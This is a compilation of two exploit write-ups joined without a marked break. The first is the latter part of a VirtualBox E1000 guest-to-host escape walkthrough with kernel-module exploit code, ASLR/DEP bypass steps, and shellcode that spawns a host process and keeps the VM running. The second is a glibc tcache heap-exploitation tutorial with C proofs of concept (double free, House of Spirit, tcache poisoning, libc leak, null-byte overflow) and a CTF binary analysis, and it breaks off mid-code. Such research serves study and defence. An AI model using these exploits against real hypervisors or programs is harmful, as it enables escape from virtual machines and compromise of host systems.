    // Configure TX registers

    g_tx_ring = kmalloc(MAX_TX_RING_SIZE, GFP_KERNEL);
    if (!g_tx_ring) {
        printk(KERN_INFO PFX"Failed to allocate TX Ring\n");
        return;
    }

    configure_TDBAL(mmio);
    configure_TDBAH(mmio);
    configure_TDLEN(mmio);
    configure_TCTL(mmio);
}

ASLR Bypass

Write primitive

From the beginning of exploit development I decided not to use primitives found in services disabled by default. This means in the first place the Chromium service (not a browser) that provides for 3D acceleration where more than 40 vulnerabilities are found by researchers in the last year.

The problem was to find an information leak in default VirtualBox subsystems. The obvious thought was that if the integer underflow allows to overflow the heap buffer then we control anything past the buffer. We’ll see that not a single additional vulnerability was required: the integer underflow appeared to be quite powerful to derive read, write, and information leak primitives from it, not saying of the stack buffer overflow.

Let’s examine what exactly is overflowed on the heap.

/**
 * Device state structure.
 */
struct E1kState_st
{
...
    uint8_t     aTxPacketFallback[E1K_MAX_TX_PKT_SIZE];
...
    E1kEEPROM   eeprom;
...
}

Here aTxPacketFallback is a buffer of size 0x3FA0 which will be overflowed with bytes copied from a data descriptor. Searching for interesting fields after the buffer I came to E1kEEPROM structure which contains another structure with the following fields (src/VBox/Devices/Network/DevE1000.cpp):

/**
 * 93C46-compatible EEPROM device emulation.
 */
struct EEPROM93C46
{
...
    bool m_fWriteEnabled;
    uint8_t Alignment1;
    uint16_t m_u16Word;
    uint16_t m_u16Mask;
    uint16_t m_u16Addr;
    uint32_t m_u32InternalWires;
...
}

How can we abuse them? E1000 implements EEPROM, secondary adaptor memory. The guest OS can access it via E1000 MMIO registers. EEPROM is implemented as a finite automaton with several states and does four actions. We are interested only in «write to memory». This is how it looks (src/VBox/Devices/Network/DevEEPROM.cpp):

EEPROM93C46::State EEPROM93C46::opWrite()
{
    storeWord(m_u16Addr, m_u16Word);
    return WAITING_CS_FALL;
}

void EEPROM93C46::storeWord(uint32_t u32Addr, uint16_t u16Value)
{
    if (m_fWriteEnabled) {
        E1kLog(("EEPROM: Stored word %04x at %08x\n", u16Value, u32Addr));
        m_au16Data[u32Addr] = u16Value;
    }
    m_u16Mask = DATA_MSB;
}

Here m_u16Addr, m_u16Word, and m_fWriteEnabled are fields of EEPROM93C46 structure we control. We can malform them in a way that

m_au16Data[u32Addr] = u16Value;

statement will write two bytes at arbitrary 16-bit offset from m_au16Data that also residing in the structure. We have found a write primitive.

Read primitive

The next problem was to find data structures on the heap to write arbitrary data into, pursuing the main goal to leak a shared library pointer to get its image base. Hopefully, it was need not to do an unstable heap spray because virtual devices’ main data structures appeared to be allocated from an internal hypervisor heap in the way that the distance between them is always constant, despite that their virtual addresses, of course, are randomized by ASLR.

When a virtual machine is launched the PDM (Pluggable Device and Driver Manager) subsystem allocates PDMDEVINS objects in the hypervisor heap.

int pdmR3DevInit(PVM pVM)
{
...
        PPDMDEVINS pDevIns;
        if (paDevs[i].pDev->pReg->fFlags & (PDM_DEVREG_FLAGS_RC | PDM_DEVREG_FLAGS_R0))
            rc = MMR3HyperAllocOnceNoRel(pVM, cb, 0, MM_TAG_PDM_DEVICE, (void **)&pDevIns);
        else
            rc = MMR3HeapAllocZEx(pVM, MM_TAG_PDM_DEVICE, cb, (void **)&pDevIns);
...

I traced that code under GDB using a script and got these results:

[trace-device-constructors] Constructing a device #0x0:
[trace-device-constructors] Name: "pcarch", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f125a "PC Architecture Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d57517b <pcarchConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c1b0
[trace-device-constructors] Data size: 0x8

[trace-device-constructors] Constructing a device #0x1:
[trace-device-constructors] Name: "pcbios", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6ef37b "PC BIOS Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d56bd3b <pcbiosConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c720
[trace-device-constructors] Data size: 0x11e8

...

[trace-device-constructors] Constructing a device #0xe:
[trace-device-constructors] Name: "e1000", '\000' <repeats 26 times>
[trace-device-constructors] Description: 0x7fc44d70c6d0 "Intel PRO/1000 MT Desktop Ethernet.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d622969 <e1kR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470083400
[trace-device-constructors] Data size: 0x53a0

[trace-device-constructors] Constructing a device #0xf:
[trace-device-constructors] Name: "ichac97", '\000' <repeats 24 times>
[trace-device-constructors] Description: 0x7fc44d716ac0 "ICH AC'97 Audio Controller"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d66a90f <ichac97R3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470088b00
[trace-device-constructors] Data size: 0x1848

[trace-device-constructors] Constructing a device #0x10:
[trace-device-constructors] Name: "usb-ohci", '\000' <repeats 23 times>
[trace-device-constructors] Description: 0x7fc44d707025 "OHCI USB controller.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d5ea841 <ohciR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008a4e0
[trace-device-constructors] Data size: 0x1728

[trace-device-constructors] Constructing a device #0x11:
[trace-device-constructors] Name: "acpi", '\000' <repeats 27 times>
[trace-device-constructors] Description: 0x7fc44d6eced8 "Advanced Configuration and Power Interface"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d563431 <acpiR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008be70
[trace-device-constructors] Data size: 0x1570

[trace-device-constructors] Constructing a device #0x12:
[trace-device-constructors] Name: "GIMDev", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f17fa "VirtualBox GIM Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d575cde <gimdevR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008dba0
[trace-device-constructors] Data size: 0x90

[trace-device-constructors] Instances:
[trace-device-constructors] #0x0 Address: 0x7fc45486c1b0
[trace-device-constructors] #0x1 Address 0x7fc45486c720 differs from previous by 0x570
[trace-device-constructors] #0x2 Address 0x7fc4700685f0 differs from previous by 0x1b7fbed0
[trace-device-constructors] #0x3 Address 0x7fc4700696d0 differs from previous by 0x10e0
[trace-device-constructors] #0x4 Address 0x7fc47006a0d0 differs from previous by 0xa00
[trace-device-constructors] #0x5 Address 0x7fc47006a450 differs from previous by 0x380
[trace-device-constructors] #0x6 Address 0x7fc47006a920 differs from previous by 0x4d0
[trace-device-constructors] #0x7 Address 0x7fc47006ad50 differs from previous by 0x430
[trace-device-constructors] #0x8 Address 0x7fc47006b240 differs from previous by 0x4f0
[trace-device-constructors] #0x9 Address 0x7fc4548ec9a0 differs from previous by 0x-1b77e8a0
[trace-device-constructors] #0xa Address 0x7fc470075f90 differs from previous by 0x1b7895f0
[trace-device-constructors] #0xb Address 0x7fc488022000 differs from previous by 0x17fac070
[trace-device-constructors] #0xc Address 0x7fc47007cf80 differs from previous by 0x-17fa5080
[trace-device-constructors] #0xd Address 0x7fc4700820f0 differs from previous by 0x5170
[trace-device-constructors] #0xe Address 0x7fc470083400 differs from previous by 0x1310
[trace-device-constructors] #0xf Address 0x7fc470088b00 differs from previous by 0x5700
[trace-device-constructors] #0x10 Address 0x7fc47008a4e0 differs from previous by 0x19e0
[trace-device-constructors] #0x11 Address 0x7fc47008be70 differs from previous by 0x1990
[trace-device-constructors] #0x12 Address 0x7fc47008dba0 differs from previous by 0x1d30

Note the E1000 device at #0xE position. It can be seen in the second list that the following device is at 0x5700 offset from E1000, the next is at 0x19E0 and so on. We already said that these distances are always the same, and it’s our exploitation opportunity.

Devices following E1000 are ICH IC’97, OHCI, ACPI, VirtualBox GIM. Learning their data structures I figured the way to use the write primitive.

On virtual machine boot up the ACPI device is created (src/VBox/Devices/PC/DevACPI.cpp):

typedef struct ACPIState
{
...
    uint8_t             au8SMBusBlkDat[32];
    uint8_t             u8SMBusBlkIdx;
    uint32_t            uPmTimeOld;
    uint32_t            uPmTimeA;
    uint32_t            uPmTimeB;
    uint32_t            Alignment5;
} ACPIState;

An ACPI port input/output handler is registered for 0x4100-0x410F range. In the case of 0x4107 port we have:

PDMBOTHCBDECL(int) acpiR3SMBusRead(PPDMDEVINS pDevIns, void *pvUser, RTIOPORT Port, uint32_t *pu32, unsigned cb)
{
    RT_NOREF1(pDevIns);
    ACPIState *pThis = (ACPIState *)pvUser;
...
    switch (off)
    {
...
        case SMBBLKDAT_OFF:
            *pu32 = pThis->au8SMBusBlkDat[pThis->u8SMBusBlkIdx];
            pThis->u8SMBusBlkIdx++;
            pThis->u8SMBusBlkIdx &= sizeof(pThis->au8SMBusBlkDat) - 1;
            break;
...

When the guest OS executes INB(0x4107) instruction to read one byte from the port, the handler takes one bytes from au8SMBusBlkDat[32] array at u8SMBusBlkIdx index and returns it to the guest. And this is how to apply the write primitive: since the distance between virtual device heap blocks are constant, so is the distance from EEPROM93C46.m_au16Data array to ACPIState.u8SMBusBlkIdx. Writing two bytes to ACPIState.u8SMBusBlkIdx we can read arbitrary data in the range of 255 bytes from ACPIState.au8SMBusBlkDat.

There is an obstacle. Having a look to ACPIState structure it can be seen that the array is placed at the end of the structure. The remaining fields are useless to leak. So let’s look what can be found after the structure:

gef➤  x/16gx (ACPIState*)(0x7fc47008be70+0x100)+1
0x7fc47008d4e0:	0xffffe98100000090	0xfffd9b2000000000
0x7fc47008d4f0:	0x00007fc470067a00	0x00007fc470067a00
0x7fc47008d500:	0x00000000a0028a00	0x00000000000e0000
0x7fc47008d510:	0x00000000000e0fff	0x0000000000001000
0x7fc47008d520:	0x000000ff00000002	0x0000100000000000
0x7fc47008d530:	0x00007fc47008c358	0x00007fc44d6ecdc6
0x7fc47008d540:	0x0031000035944000	0x00000000000002b8
0x7fc47008d550:	0x00280001d3878000	0x0000000000000000
gef➤  x/s 0x00007fc44d6ecdc6
0x7fc44d6ecdc6:	"ACPI RSDP"
gef➤  vmmap VBoxDD.so
Start                           End                             Offset                          Perm Path
0x00007fc44d4f3000 0x00007fc44d768000 0x0000000000000000 r-x /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d768000 0x00007fc44d968000 0x0000000000275000 --- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d968000 0x00007fc44d977000 0x0000000000275000 r-- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d977000 0x00007fc44d980000 0x0000000000284000 rw- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
gef➤  p 0x00007fc44d6ecdc6 - 0x00007fc44d4f3000
$2 = 0x1f9dc6

It seems there is a pointer to a string placed at a fixed offset from VBoxDD.so image base. The pointer lies at 0x58 offset at the end of ACPIState. We can read that pointer byte-by-byte using the primitives and finally obtain VBoxDD.so image base. We just hope that data past ACPIState structure is not random on each virtual machine boot. Hopefully, it isn’t; the pointer at 0x58 offset is always there.

Information Leak

Now we combine write and read primitives and exploit them to bypass ASLR. We will overflow the heap overwriting EEPROM93C46 structure, then trigger EEPROM finite automaton to write the index to ACPIState structure, and then execute INB(0x4107) in the guest to access ACPI to read one byte of the pointer. Repeat those 8 times incrementing the index by 1.

uint64_t stage_1_main(void* mmio, void* tx_ring) {
    printk(KERN_INFO PFX"##### Stage 1 #####\n");

    // When loopback mode is enabled data (network packets actually) of every Tx Data Descriptor 
    // is sent back to the guest and handled right now via e1kHandleRxPacket.
    // When loopback mode is disabled data is sent to a network as usual.
    // We disable loopback mode here, at Stage 1, to overflow the heap but not touch the stack buffer
    // in e1kHandleRxPacket. Later, at Stage 2 we enable loopback mode to overflow heap and 
    // the stack buffer.
    e1000_disable_loopback_mode(mmio);

    uint8_t leaked_bytes[8];
    uint32_t i;
    for (i = 0; i < 8; i++) {
        stage_1_overflow_heap_buffer(mmio, tx_ring, i);
        leaked_bytes[i] = stage_1_leak_byte();

        printk(KERN_INFO PFX"Byte %d leaked: 0x%02X\n", i, leaked_bytes[i]);
    }

    uint64_t leaked_vboxdd_ptr = *(uint64_t*)leaked_bytes;
    uint64_t vboxdd_base = leaked_vboxdd_ptr - LEAKED_VBOXDD_RVA;
    printk(KERN_INFO PFX"Leaked VBoxDD.so pointer: 0x%016llx\n", leaked_vboxdd_ptr);
    printk(KERN_INFO PFX"Leaked VBoxDD.so base: 0x%016llx\n", vboxdd_base);

    return vboxdd_base;
}

It has been said that in order for the integer underflow not to lead to the stack buffer overflow, certain E1000 registers should been configured. The idea is that the buffer is being overflowed in e1kHandleRxPacket function which is called while handling Tx descriptors in the loopback mode. Indeed, in the loopback mode the guest sends network packets to itself so they are received right after being sent. We disable this mode so e1kHandleRxPacket is unreachable.

DEP Bypass

We have bypassed ASLR. Now the loopback mode can be enabled and the stack buffer overflow can be triggered.

void stage_2_overflow_heap_and_stack_buffers(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
    off_t buffer_pa;
    void* buffer_va;
    alloc_buffer(&buffer_pa, &buffer_va);

    stage_2_set_up_buffer(buffer_va, vboxdd_base);
    stage_2_trigger_overflow(mmio, tx_ring, buffer_pa);

    free_buffer(buffer_va);
}

void stage_2_main(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
    printk(KERN_INFO PFX"##### Stage 2 #####\n");

    e1000_enable_loopback_mode(mmio);
    stage_2_overflow_heap_and_stack_buffers(mmio, tx_ring, vboxdd_base);
    e1000_disable_loopback_mode(mmio);
}

For now, when the last instruction of e1kHandleRxPacket is executed the saved return address is overwritten and control is transferred anywhere the attacker wants. But DEP is still there. It is bypassed in a classical way of building a ROP chain. ROP gadgets allocate executable memory, copy a shellcode loader into and execute it.

Shellcode

The shellcode loader is trivial. It copies the beginning of the overflowing buffer next to it.

use64

start:
    lea rsi, [rsp - 0x4170];
    push rax
    pop rdi
    add rdi, loader_size
    mov rcx, 0x800
    rep movsb
    nop

payload:
    ; Here the shellcode is to be

loader_size = $ - start

The shellcode is executed. Its first part is:

use64

start:
    ; sys_fork
    mov rax, 58
    syscall

    test rax, rax
    jnz continue_process_execution

    ; Initialize argv
    lea rsi, [cmd]
    mov [argv], rsi

    ; Initialize envp
    lea rsi, [env]
    mov [envp], rsi

    ; sys_execve
    lea rdi, [cmd]
    lea rsi, [argv]
    lea rdx, [envp]
    mov rax, 59
    syscall

...

cmd     db '/usr/bin/xterm', 0
env     db 'DISPLAY=:0.0', 0
argv    dq 0, 0
envp    dq 0, 0

It does fork and execve to create /usr/bin/xterm process. The attacker gains control over the host’s ring 3.

Process Continuation

I believe every exploit should be finished. It means it should not crash an application, though it’s not always possible, of course. We need the virtual machine to continue execution which is achieved by the second part of shellcode.

continue_process_execution:
    ; Restore RBP
    mov rbp, rsp
    add rbp, 0x48

    ; Skip junk
    add rsp, 0x10

    ; Restore the registers that must be preserved according to System V ABI
    pop rbx
    pop r12
    pop r13
    pop r14
    pop r15

    ; Skip junk
    add rsp, 0x8

    ; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
    ; Before:   "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
    ; After:    "E1000-Xmit" -> NULL

    ; Zero out the entire PDMQUEUE "Mouse_1" pointed by "E1000-Rcv"
    ; This was unnecessary on my testing machines but to be sure...
    mov rdi, [rbx]
    mov rax, 0x0
    mov rcx, 0xA0
    rep stosb

    ; NULL out a pointer to PDMQUEUE "E1000-Rcv" stored in "E1000-Xmit"
    ; because the first 8 bytes of "E1000-Rcv" (a pointer to "Mouse_1") 
    ; will be corrupted in MMHyperFree
    mov qword [rbx], 0x0

    ; Now the last PDMQUEUE is "E1000-Xmit" which will not be corrupted

    ret

When e1kHandleRxPacket is called a callstack is:

#0 e1kHandleRxPacket
#1 e1kTransmitFrame
#2 e1kXmitDesc
#3 e1kXmitPacket
#4 e1kXmitPending
#5 e1kR3NetworkDown_XmitPending
...

We’ll jump right to e1kR3NetworkDown_XmitPending which does nothing more and returns to a hypervisor function.

static DECLCALLBACK(void) e1kR3NetworkDown_XmitPending(PPDMINETWORKDOWN pInterface)
{
    PE1KSTATE pThis = RT_FROM_MEMBER(pInterface, E1KSTATE, INetworkDown);
    /* Resume suspended transmission */
    STATUS &= ~STATUS_TXOFF;
    e1kXmitPending(pThis, true /*fOnWorkerThread*/);
}

The shellcode adds 0x48 to RBP to make it as it should be in e1kR3NetworkDown_XmitPending. Next, the registers RBX, R12, R13, R14, R15 are taken from stack because it’s required by System V ABI to preserve it in a callee function. If they aren’t the hypervisor will crash because of invalid pointers in them.

It could be enough because the virtual machine isn’t crashes anymore and continues execute. But there will an access violation in PDMR3QueueDestroyDevice function when the VM is shutdown. The reason is that when the heap is overflowed an important structure PDMQUEUE is overwritten. Furthermore, it’s overwritten by the last two ROP gadgets i.e. the last 16 bytes. I tried to reduce the ROP chain size and failed, but when I replaced the data manually the hypervisor was still crashing. It meant the obstacle is not as obvious as seemed.

Data structure being overwritten is a linked list. Data to be overwritten is in the last second list element; a next pointer is to be overwritten. The remedy turned out to be simple:

; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
; Before:   "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
; After:    "E1000-Xmit" -> NULL

Getting rid of the last two elements allows the virtual machine to shut down smoothly.

Demo

https://vimeo.com/299325088

children tcache which is one NULL byte buffer overflow on the heap

( Original text by  )

This article is intended for the people who already have some knowledge about heap exploitation. If you already know some heap attacks on glibc<2.26 it’ll be fully understandable to you. But if you don’t, don’t worry — I’ve tried to make this post approachable for everyone with just basic knowledge. If you really know nothing about the topic, I recommend heap-exploitation.

Tcache is an internal mechanism responsible for heap management. It was introduced in glibc 2.26 in the year 2017. It’s objective is to speed up the heap management. Older algorithms are not removed, but they are still used sometimes — for example for bigger chunks, or when an appropriate tcache bin is full. But heap exploitation with this mechanism is a lot easier due to a lack of heap integrity checks.

The convention used in this post is that we call the pointer to the next chunk fd, and to the previous — bk as it is called originally in normal heap chunk.

Tcache overview

You can grab glibc 2.26 from here. The all source code that is interesting for us is located in a file malloc/malloc.c.

In this version of glibc two new functions were created:

static void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

static void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

Both of these functions can be called at the beginning of functions _int_free and __libc_malloc.tcache_put is called when the requested size of the allocated region is not greater than 0x408 and tcache bin that is appropriate for a given size is not full. A maximum number of chunks in one tcache bin is mp_.tcache_count and this variable is set to 7 by default. This variable is set here and the root is at the following piece of code:

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif

tcache_get is called when we request a chunk of the size of tcache bin and the appropriate bin contains some chunks. Every tcache bin contains chunks of only one size. From the code above we can see that it is a single linked list, similar to fastbin — it contains only a pointer to a next chunk. Also, the list is LIFO, like in fastbins. But there is a difference — each tcache bin remebers how many chunks belong to this bin in a variable tcache->counts[tc_idx].

What’s strange calloc doesn’t allocate from tcache bin.

If you want to test how tcache behaves, you can use pwndbg and compile malloc_playground.

a@x:~/Desktop/how2heap_mycp$ gdb -q ./mp
pwndbg: loaded 170 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)


Reading symbols from ./mp...(no debugging symbols found)...done.
pwndbg> r
Starting program: /home/a/Desktop/how2heap_mycp/mp 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
> malloc 0x50
==> 0x555555559670
> malloc 0x50
==> 0x5555555596d0
> malloc 0x61
==> 0x555555559730
> free 0x555555559670
==> ok
> free 0x5555555596d0
==> ok
> free 0x555555559730
==> ok
> ^C
Program received signal SIGINT, Interrupt.
[...]
pwndbg> bins
tcachebins
0x60 [  2]: 0x5555555596d0 —▸ 0x555555559670 ◂— 0x0
0x70 [  1]: 0x555555559730 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty
pwndbg> 

Tcache attacks

Due to a lack of integrity checks in tcache, many attacks are easier.

double free

Let’s consider a double free vulnerability as a first example:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	char *a = malloc(0x38);
	free(a);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
} 

As a result, we got the same pointer 2 times.

On older glibc (<2.26) to get the same result this attack is a bit more complicated:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	printf("%s","hello\n");
	char *a = malloc(0x38);
	char *b = malloc(0x38);
	free(a);
	free(b);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
} 

output:

hello
0x602420
0x602460
0x602420

We additionally need to free another chunk between due to this integrity check — we cannot add a new chunk to a fastbin list when there is already the same chunk on top. printf is called at the beginning because program crashes otherwise. Probably this is because when printf is called for the first time it initializes his buffer by mallocing some area.

House of Spirit

House of Spirit is also super easy:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long int var[10];
	var[1] = 0x40; // set the size of the chunk to 0x40

	free(&var[2]);
	char *a=malloc(0x38);
	printf("%p %p\n",a ,&var[2]);
}

output:

0x7fff899700c0 0x7fff899700c0

By freeing never allocated region we put it in the tcache bin list. And we can obtain this region when malloc is called with appropriate size as an argument. This is useful when we have the ability to overwrite some pointer by buffer overflow.

In older glibc we needed to put more effort due to this healthcheck. We need to create another fake chunk after the fried one. Like here.

tcache/fastbin poisoning

If we want to exploit malloc to return a pointer to a controlled location we can simply overwrite a pointer to a next chunk. We can forget about this integrity check in older mechanism:

#include <stdlib.h>
#include <stdio.h>

char var[]="aaaaaaaaaaaaaaa";

int main()
{
	long *a = malloc(0x38);
	long *b = malloc(0x38);
	free(a);
	free(b);
	// tcache bin 0x38 contains: b -> a 
	b[0]=&var;
	// tcache bin 0x38 contains: b -> var
	malloc(0x38);
	// tcache bin 0x38 contains: var
	char *c=malloc(0x38);
	printf("%s\n",c);
}

output:

aaaaaaaaaaaaaaa

We cannot do this by freeing only one chunk because each tcache bin remebers how many chunks belong to this bin.

libc leak

If we want to leak the libc address on glibc 2.26 we can do this:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long *a = malloc(0x1000);
	malloc(0x10);
	free(a);
	printf("%p\n",a[0]);
}  

This program prints fd of the chunk inside an unsorted bin. fd of the last chunk and bk in the first chunk in an unsorted bin are set to a pointer in libc.

If we can request malloc of at most 0x100 size this won’t work because the fried chunk won’t go to an unsorted bin list but to a tcache bin. It works only with older glibc:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	free(a);
	printf("%p\n",a[0]);
}

Hopefully if we make tcache bin full (max capacity is 7 chunks), deallocated chunk will be put in unsorted bin:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long* t[7];
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	
	// make tcache bin full
	for(int i=0;i<7;i++)
		t[i]=malloc(0x100);
	for(int i=0;i<7;i++)
		free(t[i]);
	
	free(a);
	// a is put in an unsorted bin because the tcache bin of this size is full
	printf("%p\n",a[0]);
} 

tcache attacks summary

More attacks exist for glibc with tcache. For example House of Force works in the same way as previously. Also, it’s easy to make overlapping chunks by overwriting size to a bigger value. After tcache was introduced heap exploitation is much easier. The exception is a buffer overflow by a single NULL byte, like in children tcache CTF task. I used an old attack with chunks of the smallbin size. I prevented them from going into the tcache, by making the tcache bin full.

Children Tcache overview

In this task we have 2 binaries: task and libc

The version of libc is 2.27 but there is no difference between 2.26 and 2.27 for us:

a@x:~/Desktop/children_tcache$ strings libc.so.6 | grep LIBC
[...]
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1) stable release version 2.27.

Decompiled binary looks like below:

unsigned __int64 new_heap()
{
  signed int i; // [rsp+Ch] [rbp-2034h]
  char *ptr; // [rsp+10h] [rbp-2030h]
  unsigned __int64 size; // [rsp+18h] [rbp-2028h]
  char s; // [rsp+20h] [rbp-2020h]
  unsigned __int64 v5; // [rsp+2038h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(&s, 0, 0x2010uLL);
  for ( i = 0; ; ++i )
  {
    if ( i > 9 )
    {
      puts(":(");
      return __readfsqword(0x28u) ^ v5;
    }
    if ( !pointers[i] )
      break;
  }
  printf("Size:");
  size = read_atoll();
  if ( size > 0x2000 )
    exit(-2);
  ptr = (char *)malloc(size);
  if ( !ptr )
    exit(-1);
  printf("Data:");
  read_data((__int64)&s, size);
  strcpy(ptr, &s);
  pointers[i] = ptr;
  sizes[i] = size;
  return __readfsqword(0x28u) ^ v5;
}

int show_heap()
{
  const char *v0; // rax
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v2 = read_atoll();
  if ( v2 > 9 )
    exit(-3);
  v0 = pointers[v2];
  if ( v0 )
    LODWORD(v0) = puts(pointers[v2]);
  return (signed int)v0;
}

int delete_heap()
{
  unsigned __int64 v1; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v1 = read_atoll();
  if ( v1 > 9 )
    exit(-3);
  if ( pointers[v1] )
  {
    memset((void *)pointers[v1], 0xDA, sizes[v1]);
    free((void *)pointers[v1]);
    pointers[v1] = 0LL;
    sizes[v1] = 0LL;
  }
  return puts(":)");
}

TL;DR:

We can

  • create chunk on the heap and read data into it
  • delete a chunk
  • print data in a chunk

Everything is fine, except new_heap function which is vulnerable to buffer overflow by single NULL byte. Before free, the area is filled with 0xDA byte. We can have max 10 chunks allocated at the same time and maximum requested size of a chunk is 0x2000.

In older version of glibc this attack works:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // alocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);

    // now we can allocate chunks from the area of  a|b|c
    char *A = malloc(0x108);
    char *B = malloc(0xF8);
    printf("A: %p\n",A); 
    printf("B: %p\n",B);

    free(b);
    // leak libc
    printf("B content: %p\n",((long*)B)[0]);
}

output:

a: 0x602010
b: 0x602120
A: 0x602010
B: 0x602120
B content: 0x7ffff7dd1b78

Normally, when we free chunk of the size of smallbin, there is a check whether its neighbour is freed. If so, it will consolidate with it. When we free c chunk it consolidates with a and b because of 2 reasons:

  • We have cleared the PREV_INUSE bit of chunk c so it thinks that its previous neighbour is freed.
  • We have set prev_size of chunk c to value 0x210 which is a total size of chunks a and b.

This attack can be shorter:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // alocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);

    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A); 

    // leak libc
    printf("B content: %p\n",((long*)b)[0]);
}
a: 0x602010
b: 0x602120
A: 0x602010
B content: 0x7ffff7dd1b78

In the end, we skipped allocation and deletion of B chunk because it is not needed. After c is freed, we have one unsorted bin that contains the area that is a summary of ab and c areas. After we allocated chunk A, the unsorted bin split to 2 parts. One part was returned by malloc, the other part remained at the unsorted bin and the chunk begins at the same place when b.

In our examples, the first allocated chunk has a different size than others which is 0x108. The example would work with 0xf8 but in this challenge, strcpy is used so it breaks on NULL byte so we couldn’t overwrite prev_size by 0x200 value. With size equal to 0x108 we can overwrite prev_size to 0x210.

We can accomplish the same attack on a newer libc, by using the same algorithm. But there is one difference — before freeing chunks we need to make tcache bin full. So the attack below does the same leak as the attack previously but also it goes further. After the leak, it causes double free because Band b point to the same chunk of size 0x1f8. Later, this attack is performed.

#include<stdlib.h>
#include<stdio.h>
 
char* tcache1[7]; 
char* tcache2[7]; 
 
long var;
 
int main()
{
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);
	

    printf("a: %p\n",a);
    printf("b: %p\n",b); 
    printf("c: %p\n",c);

    // make 0xf8 tcache full
    for(int i=0;i<7;i++)
